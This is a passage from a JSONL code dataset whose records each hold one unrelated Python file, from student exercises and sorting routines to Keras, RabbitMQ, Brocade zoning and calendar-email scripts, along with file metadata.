hourmin[1]*2-60\r\n print(str(d) + \":\" + str(e))\r\n else:\r\n print(str(arrival_hrs) + \":\" + str(hourmin[1]))\r\n else:\r\n arrivaltim = hourmin[0]+4\r\n if hourmin[0] == 15 and hourmin[1] == 0:\r\n print(str(arrivaltim) + \":\" + str(hourmin[1]) + \"0\")\r\n elif hourmin[0] == 15 and hourmin[1]*2 < 60:\r\n print(str(arrivaltim) + \":\" + str(hourmin[1]*2))\r\n elif hourmin[0] == 15 and hourmin[1]*2 > 60:\r\n d = arrivaltim+1\r\n e = hourmin[2]*2-60\r\n print(str(d) + \":\" + str(e))\r\n\r\n \r\n\r\narrivaltime(\"07:00\")\r\n","sub_path":"2016j4arrivaltime.py","file_name":"2016j4arrivaltime.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"226863299","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport os\nfrom keras.models import load_model \nfrom keras.preprocessing import image\nimport matplotlib.pyplot as plt\n\n#import global variables\nimg_path = input(\"[INPUT] image path >>> \")\ntrain_path = 'dataset/train'\n#import pretrained model from hdf5 file\nmodel = load_model('mobilenet_finetuned.hdf5')\n\n\ndef load_image(img_path, show=False):\n\n img = image.load_img(img_path, target_size=(150, 150))\n img_tensor = image.img_to_array(img) # (height, width, channels)\n img_tensor = np.expand_dims(img_tensor, axis=0) # (1, height, width, channels), add a dimension because the model expects this shape: (batch_size, height, width, channels)\n img_tensor /= 255. # imshow expects values in the range [0, 1]\n if show:\n plt.imshow(img_tensor[0]) \n plt.axis('off')\n plt.show()\n return img_tensor\n\n\n\n\ndef run():\n new_image = load_image(img_path)\n #create list of training lables\n # train_labels = os.listdir(train_path)\n train_labels = ['سیب', 'موز', 'انبه', 'پرتقال', 'توت فرنگی']\n # sort the training labels\n # train_labels.sort()\n preds = model.predict(new_image)\n pred_lable , pred_percent = preds.argmax(),preds.max()\n prediction = train_labels[pred_lable]\n return prediction,pred_percent\n\nif __name__ == '__main__':\n prediction , percent = run()\n print( prediction ,': ', str(percent*100),'%')\n","sub_path":"run-test.py","file_name":"run-test.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"231251034","text":"import os\nimport tqdm\nimport pickle\nimport argparse\nimport numpy as np\nfrom pathlib import Path\n\nfrom parakeet.datasets import LJSpeechMetaData\nfrom parakeet.audio import AudioProcessor, LogMagnitude\nfrom parakeet.frontend import English\n\nfrom config import get_cfg_defaults\n\ndef create_dataset(config, source_path, target_path, verbose=False):\n # create output dir\n target_path = Path(target_path).expanduser()\n mel_path = target_path / \"mel\"\n os.makedirs(mel_path, exist_ok=True)\n\n meta_data = LJSpeechMetaData(source_path)\n frontend = English()\n processor = AudioProcessor(\n sample_rate=config.data.sample_rate,\n n_fft=config.data.n_fft,\n n_mels=config.data.d_mel,\n win_length=config.data.win_length, \n hop_length=config.data.hop_length,\n f_max=config.data.f_max)\n normalizer = LogMagnitude()\n \n records = []\n for (fname, text, _) in tqdm.tqdm(meta_data):\n wav = processor.read_wav(fname)\n mel = processor.mel_spectrogram(wav)\n mel = normalizer.transform(mel)\n phonemes = frontend.phoneticize(text)\n ids = frontend.numericalize(phonemes)\n mel_name = os.path.splitext(os.path.basename(fname))[0]\n\n # save mel spectrogram\n records.append((mel_name, text, phonemes, ids))\n np.save(mel_path / mel_name, mel)\n if verbose:\n print(\"save mel spectrograms into {}\".format(mel_path))\n \n # save meta data as pickle archive\n with open(target_path / \"metadata.pkl\", 'wb') as f:\n pickle.dump(records, f)\n if verbose:\n print(\"saved metadata into {}\".format(target_path / \"metadata.pkl\"))\n\n # also save meta data into text format for inspection\n with open(target_path / \"metadata.txt\", 'wt') as f:\n for mel_name, text, phonemes, _ in records:\n phoneme_str = \"|\".join(phonemes)\n f.write(\"{}\\t{}\\t{}\\n\".format(mel_name, text, phoneme_str))\n if verbose:\n print(\"saved metadata into {}\".format(target_path / \"metadata.txt\"))\n \n print(\"Done.\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"create dataset\")\n parser.add_argument(\"--config\", type=str, metavar=\"FILE\", help=\"extra config to overwrite the default config\")\n parser.add_argument(\"--input\", type=str, help=\"path of the ljspeech dataset\")\n parser.add_argument(\"--output\", type=str, help=\"path to save output dataset\")\n parser.add_argument(\"--opts\", nargs=argparse.REMAINDER,\n help=\"options to overwrite --config file and the default config, passing in KEY VALUE pairs\"\n )\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"print msg\")\n \n config = get_cfg_defaults()\n args = parser.parse_args()\n if args.config:\n config.merge_from_file(args.config)\n if args.opts:\n config.merge_from_list(args.opts)\n config.freeze()\n print(config.data)\n\n create_dataset(config, args.input, args.output, args.verbose)\n","sub_path":"transformer_tts/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"565520120","text":"from random import randint, choice\nfrom string import ascii_letters, digits\n\nCODEPOOL = ascii_letters + digits\n\n\ndef activate_key_generator(num, length=10):\n with open('key.txt', 'w') as f:\n for i in range(num):\n s = [choice(CODEPOOL) for i in range(length)]\n f.write(''.join(s) + '\\n')\n f.close()\n\n\nif __name__ == '__main__':\n activate_key_generator(200, 10)\n","sub_path":"activatekey.py","file_name":"activatekey.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"469859134","text":"from PIL import Image\nimport numpy as np\nimport pandas as pd\n\nfilename = './me.jpeg'\nim = Image.open(filename)\nwidth, height= im.size\nLim = im.convert('L')\n\nLim = Lim.resize([130, 100]) \n\nthreshold = 180\ntable = []\nfor i in range(256):\n if i < threshold:\n table.append(0)\n else:\n table.append(1)\n\nbim = Lim.point(table, '1')\n\n#得到二值图矩形\ntest = bim.getdata()\ntest1 = np.array(test)\ntest1 = test1.reshape((100, 130))\n\npd.DataFrame(test1).to_csv('./lin.csv', index=None, header=None)","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"326476556","text":"#/usr/env python3\n#coding:utf-8\n\nimport re\nimport os\n\n\ndef validate_wwn(wwn):\n#确认单个端口或是单个wwn号格式是否正确\n if len(wwn) == 16 and re.match(r'^\\w{16}',wwn):\n return 'wwn_no_colon'\n elif len(wwn) == 23 and re.match(r'^\\w{2}:\\w{2}:\\w{2}:\\w{2}:\\w{2}:\\w{2}:\\w{2}:\\w{2}',wwn):\n return 'wwn_colon'\n elif re.match(r'^\\d+,\\d+',wwn):\n return 'wwn_port_comma'\n elif len(wwn) == 0:\n return 'no_alias'\n else:\n return False\n\n\n\ndef format_wwn(wwn):\n#转换WWN号从大写16格式(10000000C96E2898)或是大写(10:00:00:00:C9:6E:28:98)\n#转换马Brocade光纤交换机格式小写冒号格式(10:00:00:00:c9:6e:28:98)\n\n if wwn.isupper():\n wwn = wwn.lower()\n\n line = wwn[0:2]\n a = int('2')\n b = ''\n for i in (4,6,8,10,12,14,16):\n b = int(i)\n ll = wwn[int(a):int(b)]\n a = b\n line = line + ':' + ll\n return (line)\n\n\ndef create_brocade_alias(member_alias):\n #生成Brocade别名脚本\n alias_shell_list = []\n #print('create_brocade_alias',member_1)\n for i in member_alias:\n if len(member_alias[i]) != 0:\n if validate_wwn(member_alias[i]) == 'wwn_no_colon':\n member_alias[i] = format_wwn(member_alias[i])\n tmp_line = \"alicreate %s,\\\"%s\\\"\" % (i,member_alias[i])\n alias_shell_list.append(tmp_line)\n return alias_shell_list\n\n\n\n\n\ndef create_brocade_shell(member_1,member_2,cfg_name,zone_type):\n #生成Brocade脚本\n\n zone_shell_list = []\n cfg_shell_list = []\n Brocade_member_1 = member_1\n Brocade_member_2 = member_2\n Brocade_cfg_name = cfg_name\n Brocade_zone_type = zone_type\n if Brocade_zone_type == 'on':\n for i in Brocade_member_1:\n for j in Brocade_member_2:\n zone_1ine = \"zonecreate \\\"%s_%s\\\",\\\"%s;%s\\\"\" % (i,j,i,j)\n zone_shell_list.append(zone_1ine)\n cfg_line = \"cfgadd %s,\\\"%s_%s\\\"\" % (Brocade_cfg_name,i,j)\n cfg_shell_list.append(cfg_line)\n zone_shell_list.extend(cfg_shell_list)\n return zone_shell_list\n else:\n tmp_zip = zip(Brocade_member_1,Brocade_member_2)\n for i in tmp_zip:\n zone_1ine = \"zonecreate \\\"%s_%s\\\",\\\"%s;%s\\\"\" % (i[0], i[1],i[0], i[1])\n zone_shell_list.append(zone_1ine)\n cfg_line = \"cfgadd %s,\\\"%s_%s\\\"\" % (Brocade_cfg_name, i[0], i[1])\n cfg_shell_list.append(cfg_line)\n zone_shell_list.extend(cfg_shell_list)\n return zone_shell_list\n\n\n\n\n\n\n\n\ndef format_member_list(member_list):\n#处理Member-1和Member-2中的host1;wwn格式数据,例如:\n# test01_fcs0;10000000C96E2898\n# test01_fcs1;10:00:00:00:C9:6E:28:98\n# test02_fcs0;10000000C96E2898\n# test02_fcs1;1,12\n# test03_fcs0;2,34\n# test04_fcs0;10000000C96E2898\n# 返回对应的字典数据\n# {\n# 'test01_fcs0':'10000000C96E2898',\n# 'test01_fcs1':'10:00:00:00:C9:6E:28:98',\n# 'test02_fcs0':'10000000C96E2898',\n# 'test01_fcs0':'1,12',\n# 'test02_fcs1':'10000000C96E2898',\n# }\n lists_member = {}\n # print('member_list',member_list)\n # if os.name == 'nt':\n # lists = member_list.split('\\n')\n # else:\n #\n lists = member_list.split('\\n')\n\n\n # print('lists', lists)\n for line in lists:\n l = line.split(';')\n lists_member[l[0]] = l[1]\n return lists_member","sub_path":"htw_tools/Brocade_zone_tool/fabric_sub.py","file_name":"fabric_sub.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"511253626","text":"n = int(input())\n\nfor _ in range(n):\n data = list(input())\n stack = []\n\n while data:\n x = data.pop(0)\n\n if x == ')' and stack and stack[-1] == '(':\n stack.pop()\n else:\n stack.append(x)\n \n\n if stack:\n print('NO')\n else:\n print('YES')\n\n######################################################################\n\nfor _ in range(n):\n data = list(input())\n sum_ = 0\n\n for s in data:\n if s == '(':\n sum_ += 1\n else:\n sum_ -= 1\n\n if sum_ < 0:\n print('NO')\n break\n\n if sum_:\n print('NO')\n else:\n print('YES')\n","sub_path":"baekjoon/data-structure/9012.py","file_name":"9012.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"284033327","text":"#/usr/bin/env python3\nfrom __future__ import print_function\nfrom quadruped_env import QuadrupedEnvironment\nfrom a2c import A2C\nimport numpy as np\n\nenv = QuadrupedEnvironment() #functions - init, jsp_callback, normalize_js, imu_sub_callback\n # reset, step, \nstate_shape = env.state_shape[0] #this returns tuple (34,) so we need to get only the first int\naction_shape = env.action_shape[0] #this needs to be indexed too; same case as above\nagent = A2C(state_shape,action_shape,actor_lr=0.001, critic_lr=0.001, gamma=0.99)\n\nprint('A2C agent configured') \nmax_episode = 10000\ntot_rewards = []\nprint('env reset')\nprint(\"\\n*************************\")\n\nobservation, done = env.reset() #gazebo reset + states are 0 + join states are set to default\nprint(\"\\n**********************\")\nprint(\"obs, done? \",observation, done)\nprint(\"\\n***********************\")\naction = agent.select_action(observation) # a random int action is taken, with prob = action_probs\nprint(\"Action after select_action(): \",action)\nprint(\"\\n*********************\")\nobservation, reward, done = env.step(action)\n\nnoise_sigma = 0.1\nsave_cutoff = 1\ncutoff_count = 0\nsave_count = 0\n\ncurr_highest_eps_reward = -1000.0\nfor i in range(max_episode):\n if i % 100 == 0 and noise_sigma>0.03:\n agent.noise = 0.05 #constant noise for now \n noise_sigma /= 2.0\n step_num = 0\n while done == False:\n step_num += 1\n state_val = env.step(action)[0]\n action_final = agent.select_action(state_val)\n print(\"Action after reset \",action_final)\n print(\"\\n*********************\")\n observation, reward, done = env.step(action_final[0])\n print('reward:',reward,'episode:', i, 'step:',step_num,'curr high eps reward:',curr_highest_eps_reward, 'saved:',save_count, 'cutoff count:', cutoff_count)\n action, eps_reward = env.step(action)\n tot_rewards.append(eps_reward)\n if eps_reward > curr_highest_eps_reward:\n cutoff_count += 1\n curr_highest_eps_reward = eps_reward\n if cutoff_count >= save_cutoff:\n save_count += 1\n print('saving_model at episode:',i)\n agent.save_model()\n agent.save_memory()\n cutoff_count = 0\n observation, done = env.reset()\nnp.save('eps_rewards',tot_rewards)\n\nimport matplotlib.pyplot as plt\nplt.plot(tot_rewards)\n","sub_path":"src/a2c/quadruped_learn.py","file_name":"quadruped_learn.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"399050948","text":"class GraphNode:\n def __init__(self, value):\n self.value = value\n self.adjacent = []\n\n def __repr__(self):\n return f'Node: {self.value}'\n\n\nn1 = GraphNode(1)\nn2 = GraphNode(2)\nn3 = GraphNode(3)\nn4 = GraphNode(4)\nn5 = GraphNode(5)\n\nn1.adjacent.extend([n2, n3, n4])\nn2.adjacent.extend([n1, n3, n4])\nn3.adjacent.extend([n1, n2, n4])\nn4.adjacent.extend([n1, n2, n3])\n\n\ndef findNode(node, target):\n toVisit = [node]\n seen = set([])\n print(seen)\n while toVisit:\n curr = toVisit.pop()\n print(curr)\n if curr == target:\n return True\n seen.add(curr)\n toVisit.extend(list(set(curr.adjacent) - seen))\n return False\n\n\nprint('Expected: True Got: ', findNode(n1, n4))\nprint('Expect: False Got:', findNode(n1, n5))\n","sub_path":"Graphs/tofindNode.py","file_name":"tofindNode.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"240729209","text":"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\nimport functions\nimport config\nimport os.path\nimport tensorflow.keras\nimport csv\nimport matplotlib.image as mpimg\n\ncenter_images=[]\nsteering_angles=[]\nthrottle_positions=[]\nbrake_positions=[]\nspeed_values=[]\nif (os.path.isfile(config.images_pickle) and os.path.isfile(config.images_pickle)) and (not config.force_dataset_reload):\n images_file=open(config.images_pickle,'rb')\n labels_file=open(config.labels_pickle,'rb')\n images=np.load(images_file)\n steering_angles=np.load(labels_file)\n print (\"Loaded dataset from files\",config.images_pickle,\" ,\",config.labels_pickle)\n print(\"Dataset of \", images.shape[0], \"x\", images[0].shape, \"dtype=\", images.dtype, \" images\")\n images_file.close()\n labels_file.close()\nelse:\n with open(config.filepath+config.filename, newline='') as csvfile:\n reader = csv.reader(csvfile)\n header=reader.__next__()\n if header!=config.expected_header:\n raise Exception(\"Unexpected header in data file \", config.filename)\n zero_steering_frames=0\n for row in reader:\n angle=float(row[3])\n if angle!=0:#discarding all zero angle images\n center_images.append(config.filepath+row[0])\n steering_angles.append(angle)\n throttle_positions.append(float(row[4]))\n brake_positions.append(float(row[5]))\n speed_values.append(float(row[6]))\n else:\n zero_steering_frames += 1\n if zero_steering_frames <2> <3> <4> <5>\n# a/1 modified: X X\n# Lock a/1 with pos 4, 5: OK\n# Lock a/1 with pos 3, 2, ..: not OK\n# Lock a/1 with pos P: Exists an event with pos>P -> not OK\n\n\n@service_as_factory\nclass SqlOccLockerBackendService:\n connection: ConnectionHandler\n\n def assert_fqid_positions(self, fqids: Dict[str, int]) -> None:\n if not fqids:\n return\n\n query_arguments: List[Any] = []\n filter_parts = []\n for fqid, position in fqids.items():\n query_arguments.extend((fqid, position,))\n filter_parts.append(\"(fqid=%s and position>%s)\")\n query = (\n \"select fqid from events where \" + \" or \".join(filter_parts) + \" limit 1\"\n )\n\n self.raise_model_locked_if_match(query, query_arguments)\n\n def assert_fqfield_positions(self, fqfields: Dict[str, int]) -> None:\n if not fqfields:\n return\n\n event_query_arguments: List[Any] = []\n event_filter_parts = []\n collectionfield_query_arguments: List[str] = []\n collectionfield_filter_parts = []\n\n for fqfield, position in fqfields.items():\n collectionfield, fqid = collectionfield_and_fqid_from_fqfield(fqfield)\n\n event_query_arguments.extend((fqid, position,))\n event_filter_parts.append(\"(fqid=%s and position>%s)\")\n\n collectionfield = collectionfield.replace(\"_\", r\"\\_\")\n collectionfield = collectionfield.replace(\"$\", \"_%\")\n\n collectionfield_query_arguments.extend((fqid, collectionfield,))\n collectionfield_filter_parts.append(\n \"(e.fqid=%s and cf.collectionfield LIKE %s)\"\n )\n\n event_filter = \" or \".join(event_filter_parts)\n collectionfield_filter = \" or \".join(collectionfield_filter_parts)\n query = dedent(\n f\"\"\"\\\n select e.fqid from (\n select id, fqid from events where {event_filter}\n ) e\n inner join events_to_collectionfields ecf on e.id=ecf.event_id\n inner join collectionfields cf on ecf.collectionfield_id=cf.id\n where {collectionfield_filter} limit 1\"\"\"\n )\n query_arguments = event_query_arguments + collectionfield_query_arguments\n\n self.raise_model_locked_if_match(query, query_arguments)\n\n def assert_collectionfield_positions(\n self, collectionfields: Dict[str, int]\n ) -> None:\n if not collectionfields:\n return\n\n query_arguments: List[Any] = []\n filter_parts = []\n for collectionfield, position in collectionfields.items():\n query_arguments.extend((collectionfield, position,))\n filter_parts.append(\"(collectionfield=%s and position>%s)\")\n query = (\n \"select collectionfield from collectionfields where \"\n + \" or \".join(filter_parts)\n + \" limit 1\"\n )\n\n self.raise_model_locked_if_match(query, query_arguments)\n\n def raise_model_locked_if_match(self, query, arguments):\n \"\"\" returns str (the only response) or None if there is no row \"\"\"\n locked_key = self.connection.query_single_value(query, arguments)\n if locked_key is not None:\n raise ModelLocked(locked_key)\n","sub_path":"writer/writer/postgresql_backend/sql_occ_locker_backend_service.py","file_name":"sql_occ_locker_backend_service.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"26697147","text":"import json\r\nfrom channels.generic.websocket import AsyncWebsocketConsumer\r\nfrom asgiref.sync import async_to_sync\r\n\r\nclass ChatConsumer(AsyncWebsocketConsumer):\r\n async def connect(self):\r\n self.room_group_name = 'ops_coffee'\r\n\r\n # Join room group\r\n await self.channel_layer.group_add(\r\n self.room_group_name,\r\n self.channel_name\r\n )\r\n\r\n await self.accept()\r\n\r\n async def disconnect(self, close_code):\r\n # Leave room group\r\n await self.channel_layer.group_discard(\r\n self.room_group_name,\r\n self.channel_name\r\n )\r\n\r\n # Receive message from WebSocket\r\n async def receive(self, text_data):\r\n text_data_json = json.loads(text_data)\r\n print(type(text_data_json),4)\r\n message = text_data_json['message']\r\n print(message,4444)\r\n\r\n # Send message to room group\r\n await self.channel_layer.group_send(\r\n self.room_group_name,\r\n {\r\n 'type': 'chat_message',\r\n 'message': message\r\n }\r\n )\r\n\r\n # Receive message from room group\r\n async def chat_message(self, event):\r\n message = '新订单提醒'\r\n # Send message to WebSocket\r\n await self.send(text_data=json.dumps({\r\n 'message': message,\r\n }))\r\n\r\nfrom channels.layers import get_channel_layer\r\ndef push():\r\n channel_layer = get_channel_layer()\r\n async_to_sync(channel_layer.group_send)(\r\n 'ops_coffee',\r\n {\r\n \"type\":\"chat.message\",\r\n }\r\n )","sub_path":"diancan_backen/account/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"24098903","text":"# downloaded from: https://github.com/Miffyli/im2latex-dataset\n\nimport re\nimport random \nimport argparse\n\n# regexp used to tokenize formula\n# Pattern /[$-/:-?{-~!\"^_`\\[\\]]/ was taken from:\n# http://stackoverflow.com/questions/8359566/regex-to-match-symbols\nTOKENIZE_PATTERN = re.compile(\"(\\\\\\\\[a-zA-Z]+)|\"+ # \\[command name]\n #\"(\\{\\w+?\\})|\"+ # {[text-here]} Check if this is needed\n \"((\\\\\\\\)*[$-/:-?{-~!\\\"^_`\\[\\]])|\"+ # math symbols\n \"(\\w)|\"+ # single letters or other chars\n \"(\\\\\\\\)\") # \\ characters\n\n# regexps for removing \"invisible\" parts\n# First item is regexp for searching, second is string/func used to replace\nINVISIBLE_PATTERNS = [[re.compile(\"(\\\\\\\\label{.*?})\"), \"\"],\n [re.compile(\"(\\$)\"), \"\"],\n [re.compile(\"(\\\\\\>)\"), \"\"],\n [re.compile(\"(\\\\\\~)\"), \"\"],\n ]\n\n# regexps for normalizing\n# First item is regexp for searching, second is string/func used to replace\nNORMALIZE_PATTERNS = [[re.compile(\"\\{\\\\\\\\rm (.*?)\\}\"), \n lambda x: \"\\\\mathrm{\"+x.group(1)+\"}\"],\n [re.compile(\"\\\\\\\\rm{(.*?)\\}\"), \n lambda x: \"\\\\mathrm{\"+x.group(1)+\"}\"],\n [re.compile(\"SSSSSS\"), \"$\"],\n [re.compile(\" S S S S S S\"), \"$\"],\n ]\n \n\ndef tokenize_formula(formula):\n \"\"\"Returns list of tokens in given formula.\n formula - string containing the LaTeX formula to be tokenized\n Note: Somewhat work-in-progress\"\"\"\n # Tokenize\n tokens = re.finditer(TOKENIZE_PATTERN, formula)\n # To list\n tokens = list(map(lambda x: x.group(0), tokens))\n # Clean up\n tokens = [x for x in tokens if x is not None and x != \"\"]\n return tokens\n\ndef remove_invisible(formula):\n \"\"\"Removes 'invisible' parts of the formula.\n Invisible part of formula is part that doesn't change rendered picture, \n eg. \\label{...} doesn't change the visual output of formula \n formula -- formula string to be processed \n Returns processed formula\n Note: Somewhat work-in-progress\"\"\"\n for regexp in INVISIBLE_PATTERNS:\n formula = re.sub(regexp[0], regexp[1], formula)\n return formula\n \ndef normalize_formula(formula):\n \"\"\"Normalize given formula string.\n Normalisation attempts to eliminate multiple different ways of writing\n same thing. Eg. 'x^2_3' results to same output as 'x_3^2', and normalisation\n would turn all of these to same form\n formula -- formula string to be normalised\n Returns processed formula\n Note: Somewhat work-in-progress\"\"\"\n for regexp in NORMALIZE_PATTERNS:\n formula = re.sub(regexp[0], regexp[1], formula)\n return formula","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"425360480","text":"#!/usr/bin/env python3\nimport pika, json, logging\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(filename)s:%(lineno)d: %(message)s\")\n\nlog = logging.getLogger('IdentityCardTransmitter')\n\nlog.debug('connecting to message-broker')\nconnection = pika.BlockingConnection(\n pika.ConnectionParameters('localhost'))\n\n\nlog.debug('declaring queues')\nchannel = connection.channel()\nchannel.queue_declare(queue='opticoms.transmit', durable=True)\nresponse_queue = channel.queue_declare(exclusive=True).method.queue\n\n\ntargetDevices = ['10.6.100.107','10.6.100.108','10.6.100.109',]\nidentitycardList = [\n {'ID': '0030074700811', 'Name': 'Peter Körner'},\n {'ID': '0030074229747', 'Name': 'Dennis Sepeur'}\n]\n\n\nlog.info('publishing %d transmission-tasks with %d identity-cards each',\n len(targetDevices), len(identitycardList))\n\nfor targetDevice in targetDevices:\n body = {\n 'targetDevice': targetDevice,\n 'identitycardList': identitycardList,\n 'retryCount': 3,\n }\n\n log.info('issuing task for: %s', body['targetDevice'])\n channel.basic_publish(exchange='',\n routing_key='opticoms.transmit',\n properties=pika.BasicProperties(\n delivery_mode=2, # make message persistent\n reply_to=response_queue,\n correlation_id=targetDevice,\n content_type='application/json',\n ),\n body=json.dumps(body))\n\ndef handle_response(ch, method, properties, body):\n body = json.loads(body.decode('utf8'))\n\n if body['success']:\n log.info(\"received success-response for %s\",\n body['targetDevice'])\n targetDevices.remove(body['targetDevice'])\n\n elif 'retryCount' in body and body['retryCount'] > 0:\n log.info(\"received non-final fail-response for %s, %d tries remaining\",\n body['targetDevice'],\n body['retryCount'])\n\n else:\n log.info(\"received final fail-response for %s\",\n body['targetDevice'])\n targetDevices.remove(body['targetDevice'])\n\n\n if len(targetDevices) == 0:\n channel.stop_consuming()\n\n\nlog.debug('setting up consumer')\nchannel.basic_consume(handle_response,\n queue=response_queue,\n no_ack=True)\n\nlog.debug('start consuming')\nchannel.start_consuming()\n\nlog.debug('closing connection')\nconnection.close()\n","sub_path":"examples/queue/transmit-and-wait-for-response.py","file_name":"transmit-and-wait-for-response.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"620370152","text":"from . import GPIBBase\n\n\nclass RacalDana1991(GPIBBase):\n \"\"\"\n Interface to Racal-Dana 1991 Frequency Counter. \n \n This class supports context management:\n\n .. code::\n\n with RacalDana1991('GPIB::17') as freq_counter:\n pass\n\n Parameters\n ----------\n addr : str\n Instrument address, e.g. 'GPIB::15'\n kwargs\n Keyword arguments are passed to the pyvisa.ResourceManager.open_resource\n method.\n \"\"\"\n\n def __init__(self, addr, **kwargs):\n kwargs[\"read_termination\"] = \"\\r\"\n super().__init__(addr, **kwargs)\n\n self.write(\"FA\")\n self.write(\"T0\")\n\n def frequency(self):\n \"\"\"\n Return the frequency value.\n\n Returns\n -------\n frequency : float\n \"\"\"\n raw = self.read()\n return float(raw.replace(\"FA\", \"\"))\n","sub_path":"uedinst/freq_counter.py","file_name":"freq_counter.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"321368256","text":"def counting_sort(A, B, k):\n C = [0 for i in range(k+1)]\n # C[i] に i の出現数を記録する\n for j in range(len(A)):\n C[A[j]] += 1\n # C[i] に i 以下の数の出現数を記録する\n for i in range(1, k+1):\n C[i] += C[i-1]\n for j in range(len(A)-1, -1, -1):\n B[C[A[j]]-1] = A[j]\n C[A[j]] -= 1\n\nif __name__ == '__main__':\n n = int(input())\n A = [int(i) for i in input().split()]\n B = [0 for i in range(n)]\n counting_sort(A, B, max(A))\n print(\" \".join(map(str,B)))","sub_path":"ALDS1_06_A.py","file_name":"ALDS1_06_A.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"84849257","text":"# Write a guessing game where the user has to guess a secret number.\n\nx=53\ntries=1\nguess = int(input(\"type in a number: \"))\nwhile guess!=x :\n if guess>x :\n print(\"The number you typed is higher\")\n else:\n print(\"The number you typed is lower\")\n old=guess\n guess = int(input(\"type in a number: \"))\n if guess!=old : tries+=1\nprint(\"You got it on the first try!\") if tries==1 else print(\"You made it in \"+str(tries)+\" tries\")\n\n","sub_path":"SPP/ex09.py","file_name":"ex09.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"79778519","text":"def foo(date_time, temperature, threshold):\n\tresult = []\n\tprevious = None\n\n\tfor t in range(0, len(date_time)):\n\t\tif temperature[t] > threshold:\n\t\t\tif previous < threshold:\n\t\t\t\tresult.append(date_time[t])\n\t\tprevious = temperature[t]\n\treturn result\n\n# for testing purposes\nif __name__ == '__main__':\n\tT = [1460545900, 1460545910, 1460545920, 1460545930, 1460545940, 1460545950]\n\tR = [0, 7, 12, 18, 8, 17]\n\tQ = 10 \n\tprint('> {}'.format(foo(T,R,Q)))","sub_path":"EchoMobile/SWE/pset3.py","file_name":"pset3.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"601996841","text":"'''\nCrie um programa que leia uma frase qualquer e diga se ela é um palíndromo,\ndesconsiderando os espaços.\n'''\n\nfrase = str(input('Digite uma frase: ')).strip()\nfrase = frase.split()\nfrase = ''.join(frase)\ninverso = ''\nfor i in range(len(frase)-1, -1, -1):\n inverso += frase[i]\n\n\nprint(f'O inverso de {frase} é {inverso}')\nif frase == inverso:\n print('Temos um palíndromo')\nelse:\n print('Não temos um palindromo!')","sub_path":"ex053.py","file_name":"ex053.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"525232837","text":"import email\r\nimport smtplib\r\nimport datetime as dt\r\nimport icalendar\r\nimport pytz\r\nimport smtplib\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.base import MIMEBase\r\nfrom email.mime.text import MIMEText\r\nfrom email.utils import COMMASPACE, formatdate\r\nfrom email import encoders\r\nimport os,datetime\r\nfrom datetime import date \r\n\r\ntoday = date.today() \r\nprint(type(today))\r\n\r\n# Imagine this function is part of a class which provides the necessary config data\r\ndef send_appointment(date, attendee_email, organiser_email, subj, description, location, start_hour, start_minute):\r\n # Timezone to use for our dates - change as needed\r\n tz = pytz.timezone(\"Europe/London\")\r\n start = tz.localize(dt.datetime.combine(date, dt.time(start_hour, start_minute, 0)))\r\n # Build the event itself\r\n cal = icalendar.Calendar()\r\n cal.add('prodid', '-//My calendar application//example.com//')\r\n cal.add('version', '2.0')\r\n cal.add('method', \"REQUEST\")\r\n event = icalendar.Event()\r\n event.add('attendee', attendee_email)\r\n event.add('organizer', organiser_email)\r\n event.add('status', \"confirmed\")\r\n event.add('category', \"Event\")\r\n event.add('summary', subj)\r\n event.add('description', description)\r\n event.add('location', location)\r\n event.add('dtstart', start)\r\n event.add('dtend', tz.localize(dt.datetime.combine(date, dt.time(start_hour + 1, start_minute, 0))))\r\n event.add('dtstamp', tz.localize(dt.datetime.combine(date, dt.time(6, 0, 